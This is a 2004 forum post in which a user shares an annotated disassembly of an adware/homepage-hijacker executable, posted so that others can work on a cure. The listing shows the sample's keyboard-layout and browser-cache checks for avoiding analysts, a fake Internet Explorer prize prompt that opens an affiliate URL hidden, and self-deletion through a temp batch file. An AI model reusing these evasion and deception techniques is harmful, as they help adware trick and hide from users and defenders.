ACCESS[1].exe decompiled

Discussion in 'adware, spyware & hijack cleaning' started by Quai, Apr 25, 2004.

  1. Quai

    Quai Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    1
    Hi people ;)

    Seems that I have fallen foul of the mk:@MSITStore:C:\WINDOWS\start.chm::/start.html homepage hijacker!

    I managed to catch the ACCESS[1].exe file in action earlier on and took a copy of the file just in case somebody could make use of it in finding a cure.

    I doubt any sensible person would accept a dodgy .exe file from anybody, so I downloaded PE Explorer and decompiled the exe file. However, I really don't know what the listing actually means, so I am hoping somebody else can make use of it.

    If you want a copy of the file, or want me to do something to it so you can see the results....pm me


      ;------------------------------------------------------------------------------
      ;
      ; Disassembly listing generated by PE Explorer version 1.94
      ;
      ;------------------------------------------------------------------------------
      ;
      ; Name: .text (Code Section)
      ; Virtual Address: 00401000h Virtual Size: 00000BB0h
      ; Pointer To RawData: 00000200h Size Of RawData: 00000C00h
      ;
      ;------------------------------------------------------------------------------
      ; Import address table (IAT). One dword slot per imported function, filled in
      ; by the loader ("??" = no value in the file); each DLL's group ends with a
      ; zero dword and the code calls through the slots, e.g. call [KERNEL32.dll!Sleep].
      ; The import set is the sample's whole static capability: read-only registry
      ; access, file and heap helpers, ShellExecuteA and MessageBoxA. wininet.dll is
      ; not imported here; SUB_L00401340 loads it at run time for the URL-cache walk.
      ;------------------------------------------------------------------------------
      ; ADVAPI32.dll - registry, query only (used by SUB_L004017B0)
      ADVAPI32.dll!RegOpenKeyExA:
      dd ??
      ADVAPI32.dll!RegCloseKey:
      dd ??
      ADVAPI32.dll!RegQueryValueExA:
      dd ??
      dd 00000000                      ; end of ADVAPI32 group
      ; KERNEL32.dll
      KERNEL32.dll!GetTickCount:
      dd ??
      KERNEL32.dll!lstrlenA:
      dd ??
      KERNEL32.dll!GetTempPathA:
      dd ??
      KERNEL32.dll!GetEnvironmentVariableA:
      dd ??
      KERNEL32.dll!GetModuleFileNameA:
      dd ??
      KERNEL32.dll!lstrcatA:
      dd ??
      KERNEL32.dll!lstrcpyA:
      dd ??
      KERNEL32.dll!WriteFile:
      dd ??
      KERNEL32.dll!CreateFileA:
      dd ??
      KERNEL32.dll!Sleep:
      dd ??
      KERNEL32.dll!HeapAlloc:
      dd ??
      KERNEL32.dll!GetProcessHeap:
      dd ??
      KERNEL32.dll!HeapFree:
      dd ??
      KERNEL32.dll!FindFirstFileA:
      dd ??
      KERNEL32.dll!FindClose:
      dd ??
      KERNEL32.dll!LoadLibraryA:
      dd ??
      KERNEL32.dll!GetProcAddress:
      dd ??
      KERNEL32.dll!CloseHandle:
      dd ??
      KERNEL32.dll!FreeLibrary:
      dd ??
      dd 00000000                      ; end of KERNEL32 group
      ; SHELL32.dll - the only process/URL launch primitive in the sample
      SHELL32.dll!ShellExecuteA:
      dd ??
      dd 00000000                      ; end of SHELL32 group
      ; USER32.dll
      USER32.dll!GetKeyboardLayoutList:
      dd ??
      USER32.dll!MessageBoxA:
      dd ??
      dd 00000000                      ; end of the IAT
      ;------------------------------------------------------------------------------
      ; Read-only data used by the code below (PE Explorer names strings SSZ<addr>_<text>).
      ;------------------------------------------------------------------------------
      ; L00401074: NUL-terminated byte table consulted by SUB_L004013D0. Each byte is
      ; compared with the primary language ID (low byte of the HKL) of every installed
      ; keyboard layout; by the Win32 LANG_* constants these are Russian, Czech,
      ; Ukrainian, Belarusian, Estonian, Latvian and Lithuanian. A match makes the
      ; sample skip its payload, i.e. a regional exclusion list.
      L00401074:
      db 19h; LANG_RUSSIAN
      db 05h; LANG_CZECH
      db 22h; '"' LANG_UKRAINIAN
      db 23h; '#' LANG_BELARUSIAN
      db 25h; '%' LANG_ESTONIAN
      db 26h; '&' LANG_LATVIAN
      db 27h; ''' LANG_LITHUANIAN
      db 00h; terminator
      ; L0040107C: NULL-terminated array of 9 string pointers. SUB_L00401460 runs a
      ; strstr() of each against every URL in the IE cache; judging by the names these
      ; are anti-spyware help boards and webmaster/affiliate forums, so a hit marks a
      ; user likely to notice or report the adware and the payload is skipped.
      L0040107C:
      dd SSZ00401128_go****yourself_com
      dd SSZ0040111C_crutop_nu
      dd SSZ00401108_webmasterworld_com
      dd SSZ004010F8_dialerschutz_de
      dd SSZ004010E8_spywareinfo_
      dd SSZ004010D0_adultwebmasterinfo_com
      dd SSZ004010C0_boards_cexx_org
      dd SSZ004010B0_statsbank_com
      dd SSZ004010A4_tibsystems_
      db 00h; NULL pointer terminating the array
      db 00h;
      db 00h;
      db 00h;
      ; The domain fragments themselves (one is censored by the forum software).
      SSZ004010A4_tibsystems_:
      db 'tibsystems.',0
      SSZ004010B0_statsbank_com:
      db 'statsbank.com',0
      Align 4
      SSZ004010C0_boards_cexx_org:
      db 'boards.cexx.org',0
      SSZ004010D0_adultwebmasterinfo_com:
      db 'adultwebmasterinfo.com',0
      Align 4
      SSZ004010E8_spywareinfo_:
      db 'spywareinfo.',0
      Align 4
      SSZ004010F8_dialerschutz_de:
      db 'dialerschutz.de',0
      SSZ00401108_webmasterworld_com:
      db 'webmasterworld.com',0
      Align 4
      SSZ0040111C_crutop_nu:
      db 'crutop.nu',0
      Align 4
      SSZ00401128_go****yourself_com:
      db 'go****yourself.com',0
      Align 4
      ; Export names resolved with GetProcAddress by SUB_L00401340 (wininet URL-cache API).
      SSZ0040113C_FindCloseUrlCache:
      db 'FindCloseUrlCache',0
      Align 4
      SSZ00401150_FindNextUrlCacheEntryA:
      db 'FindNextUrlCacheEntryA',0
      Align 4
      SSZ00401168_FindFirstUrlCacheEntryA:
      db 'FindFirstUrlCacheEntryA',0
      SSZ00401180_wininet_dll:
      db 'wininet.dll',0
      ; Pieces SUB_L00401600 concatenates into   <COMSPEC> /c <tmp>.bat "<this exe>"
      SSZ0040118C_COMSPEC:
      db 'COMSPEC',0
      L00401194:
      db 22h; '"'  closing quote around the exe path
      db 00h;
      db 00h;
      db 00h;
      L00401198:
      db 20h; ' '  ' "' separator plus opening quote
      db 22h; '"'
      db 00h;
      db 00h;
      SSZ0040119C__bat:
      db '.bat',0
      Align 4
      L004011A4:
      db 2Fh; '/'  "/c " cmd.exe switch
      db 63h; 'c'
      db 20h; ' '
      db 00h;
      ; Batch-file template (70 bytes are written, 71 with the NUL) that SUB_L00401600
      ; drops in the temp directory and runs as  <tmp>.bat "<exe>". It loops,
      ; overwriting and deleting %1 (this executable) until the delete succeeds, i.e.
      ; once the process has exited, then deletes itself (%0). The only trace left is
      ; a short-lived <4 letters>.bat in %TEMP% while the loop is running.
      SSZ004011A8__echo_off___start__echo____1__de:
      db '@echo off',0Dh,0Ah,':start',0Dh,0Ah,'echo > %1',0Dh,0Ah,'del %1',0Dh,0Ah,'if exist %1 goto start',0Dh,0Ah,'del %0',0Dh,0Ah,0
      Align 4
      ; ShellExecuteA verb used by EntryPoint to open the URL below.
      SSZ004011F0_open:
      db 'open',0
      Align 4
      ; Network indicator: EntryPoint appends the registry value 'cid' (below) to this
      ; and hands the result to ShellExecuteA, i.e. the default browser, with SW_HIDE.
      SSZ004011F8_http___www_master_search_com_top:
      db 'http://www.master-search.com/top/poppok.php?act=1&data=1&cid=',0
      Align 4
      ; Registry indicator: opened under HKEY_CURRENT_USER by EntryPoint; the value
      ; 'cid' read from it is presumably an affiliate/campaign id written by whatever
      ; installed the sample - this binary only reads it, it never writes the registry.
      SSZ00401238_SOFTWARE_Microsoft_Internet_Expl:
      db 'SOFTWARE\Microsoft\Internet Explorer\Main\Config',0
      Align 4
      L0040126C:
      db 63h; 'c'  value name "cid"
      db 69h; 'i'
      db 64h; 'd'
      db 00h;
      ; MessageBoxA text and caption shown by EntryPoint (MB_YESNO). The caption is
      ; worded to look like an Internet Explorer prompt.
      SSZ00401270_The__3_5_MILLION_PRIZE_IS_READY_:
      db 'The $3.5 MILLION PRIZE IS READY NOW!!! Do you wish to apply for it with PartyPoker?',0Ah,'Note: by clicking YES you confirm, that you at least 21 yr. old.',0
      Align 4
      SSZ00401308_Internet_Explorer___3500000_for_:
      db 'Internet Explorer: $3500000 for Party Poker',0
      ; Padding up to SUB_L00401340 (16-byte boundary).
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      ;------------------------------------------------------------------------------
      ; BOOL SUB_L00401340(void)   -- "should the payload run?" gate
      ; Loads wininet.dll, resolves the three URL-cache enumeration exports into the
      ; globals L00401914 / L00401910 / L00401918, then runs the two checks:
      ;   SUB_L00401460  no listed anti-spyware/webmaster site in the IE URL cache
      ;   SUB_L004013D0  no keyboard layout from the excluded language list
      ; wininet.dll is loaded only to reach its exports; the file is not modified.
      ; ABI:   no arguments, no stack cleanup
      ; Out:   al = 1 only if wininet loaded, all three exports resolved and both
      ;        checks passed; 0 otherwise
      ; Uses:  bl = result, esi = hModule, edi = GetProcAddress (saved/restored)
      ; Side:  writes the three globals; FreeLibrary is called on every path
      ;------------------------------------------------------------------------------
      SUB_L00401340:
      push ebx
      push esi
      push SSZ00401180_wininet_dll
      xor bl,bl                        ; bl = result = 0
      call [KERNEL32.dll!LoadLibraryA]
      mov esi,eax                      ; esi = hModule(wininet.dll)
      test esi,esi
      jz L004013BE                     ; load failed: return 0 (FreeLibrary(NULL) below just fails)
      push edi
      mov edi,[KERNEL32.dll!GetProcAddress]
      push SSZ00401168_FindFirstUrlCacheEntryA
      push esi
      call edi
      push SSZ00401150_FindNextUrlCacheEntryA
      push esi
      mov [L00401914],eax              ; L00401914 = FindFirstUrlCacheEntryA
      call edi
      push SSZ0040113C_FindCloseUrlCache
      push esi
      mov [L00401910],eax              ; L00401910 = FindNextUrlCacheEntryA
      call edi
      mov ecx,[L00401914]
      mov [L00401918],eax              ; L00401918 = FindCloseUrlCache
      test ecx,ecx
      pop edi
      jz L004013BE                     ; any unresolved export -> return 0
      mov ecx,[L00401910]
      test ecx,ecx
      jz L004013BE
      test eax,eax
      jz L004013BE
      call SUB_L00401460               ; IE URL-cache check
      test al,al
      jz L004013BC
      call SUB_L004013D0               ; keyboard-layout check
      test al,al
      jz L004013BC
      push esi
      mov bl,01h                       ; both checks passed
      call [KERNEL32.dll!FreeLibrary]
      mov al,bl
      pop esi
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      L004013BC:
      xor bl,bl                        ; a check failed
      L004013BE:
      push esi
      call [KERNEL32.dll!FreeLibrary]
      mov al,bl
      pop esi
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      Align 8
      ;------------------------------------------------------------------------------
      ; BOOL SUB_L004013D0(void)   -- keyboard-layout (locale) exclusion check
      ; Enumerates the installed keyboard layouts (HKLs) and compares the low byte of
      ; each (the primary language ID) with the byte table at L00401074 through
      ; SUB_L004018E0 (strchr). Returns 0 if any layout is on the list, so the payload
      ; is skipped on systems with those locales. Also returns 0 when the layout count
      ; is zero, the allocation fails, or the second GetKeyboardLayoutList call
      ; returns a different count.
      ; ABI:   no arguments
      ; Out:   al = 1 if no excluded layout is installed, 0 otherwise
      ; Uses:  esi = layout count, ebp = HKL array (heap), edi = GetKeyboardLayoutList
      ;        and later the current array element, ebx = loop index
      ;------------------------------------------------------------------------------
      SUB_L004013D0:
      push ebx
      push ebp
      push esi
      push edi
      mov edi,[USER32.dll!GetKeyboardLayoutList]
      push 00000000h
      push 00000000h
      call edi                         ; GetKeyboardLayoutList(0, NULL) -> count
      mov esi,eax
      test esi,esi
      jnz L004013ED
      pop edi
      pop esi
      pop ebp
      xor al,al                        ; no layouts reported -> 0
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      L004013ED:
      lea eax,[00000000h+esi*4]        ; count * sizeof(HKL)
      push eax
      call SUB_L00401850               ; zeroed heap block
      mov ebp,eax
      add esp,00000004h
      test ebp,ebp
      jnz L0040140A
      pop edi
      pop esi
      pop ebp
      xor al,al                        ; allocation failed -> 0
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      L0040140A:
      push ebp
      push esi
      call edi                         ; GetKeyboardLayoutList(count, array)
      cmp esi,eax
      jz L00401422
      L00401412:                       ; free the array and return 0
      push ebp
      call SUB_L00401870
      add esp,00000004h
      xor al,al
      pop edi
      pop esi
      pop ebp
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      L00401422:
      xor ebx,ebx                      ; ebx = index
      test esi,esi
      jle L00401450
      mov edi,ebp                      ; edi = &array[0]
      L0040142A:
      xor eax,eax
      mov ax,[edi]                     ; low word of the HKL = language ID
      test al,al                       ; al = primary language ID
      jz L00401448
      movsx ecx,al
      push ecx
      push L00401074
      call SUB_L004018E0               ; strchr(table, primary language)
      add esp,00000008h
      test eax,eax
      jnz L00401412                    ; on the list -> 0
      L00401448:
      inc ebx
      add edi,00000004h
      cmp ebx,esi
      jl L0040142A
      L00401450:                       ; no excluded layout: free the array, return 1
      push ebp
      call SUB_L00401870
      add esp,00000004h
      mov al,01h
      pop edi
      pop esi
      pop ebp
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      ;------------------------------------------------------------------------------
      ; BOOL SUB_L00401460(void)   -- "has the user visited a listed site?" check
      ; Walks the Internet Explorer URL cache through the wininet function pointers
      ; stored in L00401914 (FindFirstUrlCacheEntryA), L00401910 (FindNextUrl-
      ; CacheEntryA) and L00401918 (FindCloseUrlCache). For every entry the URL
      ; string (INTERNET_CACHE_ENTRY_INFOA.lpszSourceUrlName, offset 4) is searched
      ; with SUB_L00401890 (strstr) for each domain in the table at L0040107C. The
      ; first hit ends the walk with 0; an exhausted or failed walk, a failed
      ; allocation and an empty cache all yield 1 ("clean").
      ; ABI:   no arguments; SUB_L00401340 must have filled the three globals
      ; Out:   al = 1 if none of the listed sites is in the cache, 0 if one is
      ; Uses:  edi = 1000h-byte entry buffer (heap), ebx = enumeration handle,
      ;        esi = cursor in the domain table, [esp+0Ch] = buffer size in/out
      ;------------------------------------------------------------------------------
      SUB_L00401460:
      push ecx                         ; local: lpcbCacheEntryInfo
      push ebx
      push esi
      push edi
      push 00001000h
      call SUB_L00401850
      mov edi,eax                      ; edi = entry buffer
      add esp,00000004h
      test edi,edi
      jz L004014FD                     ; no memory -> 1
      lea eax,[esp+0Ch]
      mov dword ptr [esp+0Ch],00001000h ; size = buffer size
      push eax
      push edi
      push 00000000h                   ; lpszUrlSearchPattern = NULL (all entries)
      call [L00401914]                 ; FindFirstUrlCacheEntryA
      mov ebx,eax                      ; ebx = enumeration handle
      test ebx,ebx
      jz L004014F4                     ; empty cache / failure -> 1
      L00401497:                       ; per cache entry
      mov eax,[L0040107C]
      mov esi,L0040107C                ; esi = &domain_table[0]
      test eax,eax
      jz L004014C2
      L004014A5:                       ; per domain
      mov ecx,[esi]
      mov edx,[edi+04h]                ; entry->lpszSourceUrlName
      push ecx
      push edx
      call SUB_L00401890               ; strstr(url, domain)
      add esp,00000008h
      test eax,eax
      jnz L004014DD                    ; found -> 0
      mov eax,[esi+04h]
      add esi,00000004h
      test eax,eax
      jnz L004014A5
      L004014C2:
      lea eax,[esp+0Ch]
      mov dword ptr [esp+0Ch],00001000h ; reset size before each call
      push eax
      push edi
      push ebx
      call [L00401910]                 ; FindNextUrlCacheEntryA
      test eax,eax
      jz L004014ED                     ; end of cache -> 1
      jmp L00401497
      L004014DD:                       ; listed site seen: free buffer, return 0
      push edi
      call SUB_L00401870
      add esp,00000004h
      xor al,al
      pop edi
      pop esi
      pop ebx
      pop ecx
      retn
      ;------------------------------------------------------------------------------
      L004014ED:
      push ebx
      call [L00401918]                 ; FindCloseUrlCache
      L004014F4:
      push edi
      call SUB_L00401870
      add esp,00000004h
      L004014FD:
      pop edi
      pop esi
      mov al,01h                       ; nothing found -> 1
      pop ebx
      pop ecx
      retn
      ;------------------------------------------------------------------------------
      Align 16
      ;------------------------------------------------------------------------------
      ; BOOL SUB_L00401510(const char *path)   -- "does this file exist?"
      ; Reserves 140h bytes (sizeof WIN32_FIND_DATAA) on the stack and calls
      ; FindFirstFileA; any handle other than INVALID_HANDLE_VALUE means the path
      ; exists, and it is closed again at once. NULL or "" return 0 without a call.
      ; ABI:   cdecl, 1 argument; caller pops (callers use add esp,4)
      ; Out:   al = 1 if found, 0 otherwise
      ; Used by SUB_L00401550 to retry until a generated temp-file name is unused.
      ;------------------------------------------------------------------------------
      SUB_L00401510:
      mov eax,[esp+04h]                ; eax = path
      sub esp,00000140h                ; WIN32_FIND_DATAA find_data
      test eax,eax
      jz L00401544
      cmp byte ptr [eax],00h
      jz L00401544
      lea ecx,[esp+00h]                ; &find_data
      push ecx
      push eax
      call [KERNEL32.dll!FindFirstFileA]
      cmp eax,FFFFFFFFh                ; INVALID_HANDLE_VALUE
      jz L00401544
      push eax
      call [KERNEL32.dll!FindClose]
      mov al,01h
      add esp,00000140h
      retn
      ;------------------------------------------------------------------------------
      L00401544:
      xor al,al
      add esp,00000140h
      retn
      ;------------------------------------------------------------------------------
      Align 4
      ;------------------------------------------------------------------------------
      ; void SUB_L00401550(char *buf, const char *ext, const char *prefix)
      ; Builds a not-yet-existing file name in the temp directory:
      ;   buf = GetTempPathA() + prefix + <4 letters from GetTickCount> + ext
      ; The 4 letters are the low nibbles of the tick count mapped to 'a'..'p'
      ; (nibble + 61h). While SUB_L00401510 reports the name as existing, the letters
      ; are regenerated. Called by SUB_L00401600 with ext ".bat" and prefix NULL.
      ; ABI:   cdecl, 3 args; caller pops (add esp,0Ch). Return value unused.
      ; In:    [esp+04h] buf (GetTempPathA is given a 104h-byte limit; nothing else
      ;        is bounds-checked), [esp+08h] ext, [esp+0Ch] prefix (may be NULL)
      ; Uses:  ebx = buf, [esp+10h] (saved ecx slot) = buf + strlen(temp path),
      ;        [esp+18h] (arg-1 slot, reused) = strlen(prefix) or 0,
      ;        ebp = position of the 4 letters, esi/edi = rep movs cursors
      ;------------------------------------------------------------------------------
      SUB_L00401550:
      push ecx                         ; local slot
      push ebx
      mov ebx,[esp+0Ch]                ; ebx = buf
      push ebp
      push esi
      push edi
      push ebx
      push 00000104h
      call [KERNEL32.dll!GetTempPathA] ; GetTempPathA(MAX_PATH, buf)
      mov esi,[KERNEL32.dll!lstrlenA]
      push ebx
      call esi
      mov edi,eax
      mov eax,[esp+20h]                ; eax = prefix
      add edi,ebx                      ; edi = buf + strlen(temp path)
      test eax,eax
      mov [esp+10h],edi                ; remembered for retries
      jz L0040158A
      push eax
      call esi
      mov [esp+18h],eax                ; strlen(prefix)
      lea ebp,[eax+edi]                ; ebp = where the letters go
      jmp L0040159F
      L0040158A:
      mov dword ptr [esp+18h],00000000h ; no prefix
      mov eax,[esp+18h]
      lea ebp,[eax+edi]
      jmp L0040159F
      L0040159B:                       ; retry: generated name already exists
      mov edi,[esp+10h]
      L0040159F:
      mov esi,[esp+20h]                ; esi = prefix
      test esi,esi
      jz L004015B9
      mov ecx,[esp+18h]
      mov edx,ecx
      shr ecx,02h
      rep movsd                        ; copy prefix: dwords, then the remainder
      mov ecx,edx
      and ecx,00000003h
      rep movsb
      L004015B9:
      mov esi,ebp
      call [KERNEL32.dll!GetTickCount]
      mov ecx,00000004h                ; 4 letters
      L004015C6:
      mov dl,al
      and dl,0Fh
      add dl,61h                       ; nibble -> 'a'..'p'
      mov [esi],dl
      inc esi
      shr eax,04h
      dec ecx
      jnz L004015C6
      mov eax,[esp+1Ch]                ; eax = ext
      lea ecx,[ebp+04h]
      push eax
      push ecx
      mov byte ptr [esi],00h
      call [KERNEL32.dll!lstrcpyA]     ; append ext after the letters
      push ebx
      call SUB_L00401510               ; already exists? then try another name
      add esp,00000004h
      test al,al
      jnz L0040159B
      pop edi
      pop esi
      pop ebp
      pop ebx
      pop ecx
      retn
      ;------------------------------------------------------------------------------
      Align 8
      ;------------------------------------------------------------------------------
      ; void SUB_L00401600(HMODULE hModule)   -- self-deletion through a temp batch file
      ; 1. copies the 71-byte batch template SSZ004011A8 to a stack buffer;
      ; 2. SUB_L00401550 picks an unused %TEMP%\<4 letters>.bat name, placed right
      ;    after "/c " in the parameter buffer;
      ; 3. CreateFileA(GENERIC_WRITE, CREATE_ALWAYS) + WriteFile(70 bytes) creates it;
      ; 4. the parameter buffer becomes   /c <tmp>.bat "<GetModuleFileNameA(hModule)>"
      ; 5. ShellExecuteA(NULL, NULL, %COMSPEC%, params, "", SW_HIDE) runs it hidden.
      ; The batch loops until the executable can be deleted, then deletes itself.
      ; EntryPoint calls this unconditionally with hModule = 0 (the running exe), so
      ; the sample removes itself whether or not the payload ran.
      ; ABI:   cdecl, 1 argument (caller does add esp,4); no return value
      ; Stack, esp-relative after the two pushes:
      ;        +08h   DWORD bytes written by WriteFile
      ;        +0Ch   batch text (71 bytes)
      ;        +54h   200h-byte parameter buffer: "/c " at +54h, .bat path at +57h
      ;        +254h  200h-byte buffer for the COMSPEC value
      ; Note:  no return value is checked (CreateFileA, WriteFile, GetEnvironment-
      ;        VariableA, ShellExecuteA) and no buffer length is enforced.
      ;------------------------------------------------------------------------------
      SUB_L00401600:
      sub esp,0000044Ch
      mov ecx,00000011h                ; 11h dwords + a word + a byte = 71 bytes
      lea eax,[esp+4Ch]                ; eax = parameter buffer (esp+54h after pushes)
      push esi
      push edi
      mov esi,SSZ004011A8__echo_off___start__echo____1__de
      lea edi,[esp+0Ch]                ; edi = batch text buffer
      rep movsd
      movsw
      push L004011A4                   ; "/c "
      push eax
      movsb
      call [KERNEL32.dll!lstrcpyA]     ; params = "/c "
      push 00000000h                   ; prefix = NULL
      lea ecx,[esp+5Bh]                ; params + 3, right after "/c "
      push SSZ0040119C__bat            ; ext = ".bat"
      push ecx
      call SUB_L00401550               ; unused %TEMP%\xxxx.bat name
      add esp,0000000Ch
      lea edx,[esp+57h]                ; edx = the .bat path
      push 00000000h                   ; hTemplateFile
      push 00000080h                   ; FILE_ATTRIBUTE_NORMAL
      push 00000004h                   ; CREATE_ALWAYS
      push 00000000h                   ; lpSecurityAttributes
      push 00000000h                   ; dwShareMode = 0
      push 40000000h                   ; GENERIC_WRITE
      push edx
      call [KERNEL32.dll!CreateFileA]
      mov esi,eax                      ; esi = file handle (not checked)
      lea eax,[esp+08h]                ; &bytesWritten
      push 00000000h
      push eax
      lea ecx,[esp+14h]                ; batch text
      push 00000046h                   ; 70 bytes, without the NUL
      push ecx
      push esi
      call [KERNEL32.dll!WriteFile]
      push esi
      call [KERNEL32.dll!CloseHandle]
      mov esi,[KERNEL32.dll!lstrcatA]
      lea edx,[esp+54h]
      push L00401198                   ; ' "'
      push edx
      call esi
      lea eax,[esp+54h]
      push 00000200h                   ; nSize for GetModuleFileNameA below
      push eax
      call [KERNEL32.dll!lstrlenA]     ; eax = strlen(params)
      mov edx,[esp+0000045Ch]          ; edx = hModule argument
      lea ecx,[esp+eax+58h]            ; params + strlen(params)
      push ecx
      push edx
      call [KERNEL32.dll!GetModuleFileNameA] ; append this executable's path
      lea eax,[esp+54h]
      push L00401194                   ; '"'
      push eax
      call esi
      lea ecx,[esp+00000254h]
      push 00000200h
      push ecx
      push SSZ0040118C_COMSPEC
      call [KERNEL32.dll!GetEnvironmentVariableA] ; command-interpreter path
      push 00000000h                   ; nShowCmd = SW_HIDE
      lea edx,[esp+58h]                ; lpParameters = params
      push L0040191C                   ; lpDirectory = "" (zero bytes at L0040191C)
      lea eax,[esp+0000025Ch]          ; lpFile = COMSPEC value
      push edx
      push eax
      push 00000000h                   ; lpOperation = NULL
      push 00000000h                   ; hwnd = NULL
      call [SHELL32.dll!ShellExecuteA]
      pop edi
      pop esi
      add esp,0000044Ch
      retn
      ;------------------------------------------------------------------------------
      Align 8
      ;------------------------------------------------------------------------------
      ;------------------------------------------------------------------------------
      ; EntryPoint -- WinMain-style entry (retn 10h pops 4 stack args, none is read)
      ; Behaviour of the sample, in order:
      ;   1. SUB_L00401340: skip the payload if a listed site is in the IE cache or
      ;      an excluded keyboard layout is installed.
      ;   2. Sleep(1D4C0h = 120000 ms): two minutes of silence after launch.
      ;   3. MessageBoxA(MB_YESNO) with the "$3.5 MILLION PRIZE ... PartyPoker" text.
      ;   4. On IDYES (6): read HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer
      ;      \Main\Config value "cid" through SUB_L004017B0, build
      ;        http://www.master-search.com/top/poppok.php?act=1&data=1&cid=<cid>
      ;      and ShellExecuteA(NULL,"open",url,NULL,NULL,SW_HIDE) -> default browser.
      ;   5. Always: SUB_L00401600(0) deletes this executable through a temp .bat.
      ; Out:   eax = 0
      ; Uses:  edi = 400h-byte buffer for cid, esi = 400h-byte buffer for the URL,
      ;        ebx = lstrcatA (ebx/esi/edi are saved around that part only).
      ;        Neither allocation result is checked.
      ;------------------------------------------------------------------------------
      EntryPoint:
      call SUB_L00401340               ; environment gate
      test al,al
      jz L0040179C                     ; gated out: still self-delete
      push 0001D4C0h                   ; 120000 ms
      call [KERNEL32.dll!Sleep]
      push 00000004h                   ; MB_YESNO
      push SSZ00401308_Internet_Explorer___3500000_for_ ; caption
      push SSZ00401270_The__3_5_MILLION_PRIZE_IS_READY_ ; text
      push 00000000h                   ; hwnd = NULL
      call [USER32.dll!MessageBoxA]
      cmp eax,00000006h                ; IDYES
      jnz L0040179C
      push ebx
      push esi
      push edi
      push 00000400h
      call SUB_L00401850               ; zeroed 400h buffer for "cid"
      push 00000400h
      mov edi,eax
      call SUB_L00401850               ; zeroed 400h buffer for the URL
      push edi                         ; out buffer
      push L0040126C                   ; "cid"
      push SSZ00401238_SOFTWARE_Microsoft_Internet_Expl
      push 80000001h                   ; HKEY_CURRENT_USER
      mov esi,eax
      call SUB_L004017B0               ; result ignored: buffer stays "" if absent
      mov ebx,[KERNEL32.dll!lstrcatA]
      add esp,00000018h                ; 4 args + the two 400h pushes
      push SSZ004011F8_http___www_master_search_com_top
      push esi
      call ebx                         ; url = base URL (buffer was zeroed)
      push edi
      push esi
      call ebx                         ; url += cid
      push 00000000h                   ; nShowCmd = SW_HIDE
      push 00000000h                   ; lpDirectory
      push 00000000h                   ; lpParameters
      push esi                         ; lpFile = url
      push SSZ004011F0_open            ; lpOperation
      push 00000000h                   ; hwnd
      call [SHELL32.dll!ShellExecuteA]
      push esi
      call SUB_L00401870
      push edi
      call SUB_L00401870
      add esp,00000008h
      pop edi
      pop esi
      pop ebx
      L0040179C:
      push 00000000h                   ; hModule = NULL -> this executable
      call SUB_L00401600               ; self-delete
      add esp,00000004h
      xor eax,eax
      retn 0010h
      ;------------------------------------------------------------------------------
      Align 8
      ;------------------------------------------------------------------------------
      ; BOOL SUB_L004017B0(HKEY hKey, const char *subKey, const char *valueName,
      ;                    char *out)   -- read a registry value as a string
      ; RegOpenKeyExA(hKey, subKey, 0, KEY_QUERY_VALUE) then RegQueryValueExA twice:
      ; once for the size, then into a zeroed heap block of that size, which is
      ; copied to out with lstrcpyA (no length limit; EntryPoint's buffer is 400h
      ; bytes) and freed. The value type is not checked. RegCloseKey runs whenever
      ; the open succeeded.
      ; ABI:   cdecl, 4 args; caller pops
      ; Out:   al = 1 if the value was read and copied, 0 otherwise (key missing,
      ;        value missing or zero-length, second query failed)
      ; Uses:  bl = result, esi = 0 then the heap block, edi = valueName,
      ;        ebp = RegQueryValueExA, [esp+10h] (saved ecx slot) = opened HKEY,
      ;        [esp+1Ch] (arg-2 slot, reused) = cbData
      ;------------------------------------------------------------------------------
      SUB_L004017B0:
      push ecx                         ; local: HKEY result
      mov ecx,[esp+0Ch]                ; ecx = subKey
      mov edx,[esp+08h]                ; edx = hKey
      push ebx
      push ebp
      push esi
      lea eax,[esp+0Ch]                ; &hkResult
      push edi
      xor esi,esi
      push eax                         ; phkResult
      push 00000001h                   ; samDesired = KEY_QUERY_VALUE
      push esi                         ; ulOptions = 0
      push ecx
      push edx
      xor bl,bl                        ; bl = result = 0
      mov [esp+24h],esi                ; hkResult = 0
      call [ADVAPI32.dll!RegOpenKeyExA]
      test eax,eax
      jnz L00401837                    ; open failed -> 0
      mov edi,[esp+20h]                ; edi = valueName
      mov ecx,[esp+10h]                ; ecx = opened key
      mov ebp,[ADVAPI32.dll!RegQueryValueExA]
      lea eax,[esp+1Ch]                ; &cbData
      push eax
      push esi                         ; lpData = NULL (size query)
      push esi                         ; lpType = NULL
      push esi                         ; lpReserved
      push edi
      push ecx
      mov [esp+34h],esi                ; cbData = 0
      call ebp
      mov eax,[esp+1Ch]
      cmp eax,esi
      jz L00401837                     ; zero size / not found -> 0
      push eax
      call SUB_L00401850               ; block of cbData bytes
      add esp,00000004h
      lea edx,[esp+1Ch]
      mov esi,eax                      ; esi = block (not checked for NULL)
      mov eax,[esp+10h]
      push edx
      push esi
      push 00000000h
      push 00000000h
      push edi
      push eax
      call ebp                         ; RegQueryValueExA(key, name, 0, 0, block, &cb)
      test eax,eax
      jnz L0040182E
      mov ecx,[esp+24h]                ; ecx = out
      push esi
      push ecx
      call [KERNEL32.dll!lstrcpyA]     ; out = block
      mov bl,01h
      L0040182E:
      push esi
      call SUB_L00401870
      add esp,00000004h
      L00401837:
      mov eax,[esp+10h]
      test eax,eax
      jz L00401846
      push eax
      call [ADVAPI32.dll!RegCloseKey]
      L00401846:
      pop edi
      pop esi
      mov al,bl
      pop ebp
      pop ebx
      pop ecx
      retn
      ;------------------------------------------------------------------------------
      Align 4
      ;------------------------------------------------------------------------------
      ; void *SUB_L00401850(DWORD size)
      ; HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY (8), size). Returns the zeroed
      ; block in eax, or NULL. cdecl: the caller pops the argument.
      ;------------------------------------------------------------------------------
      SUB_L00401850:
      mov eax,[esp+04h]                ; size
      push eax
      push 00000008h                   ; HEAP_ZERO_MEMORY
      call [KERNEL32.dll!GetProcessHeap]
      push eax
      call [KERNEL32.dll!HeapAlloc]
      retn
      ;------------------------------------------------------------------------------
      Align 16
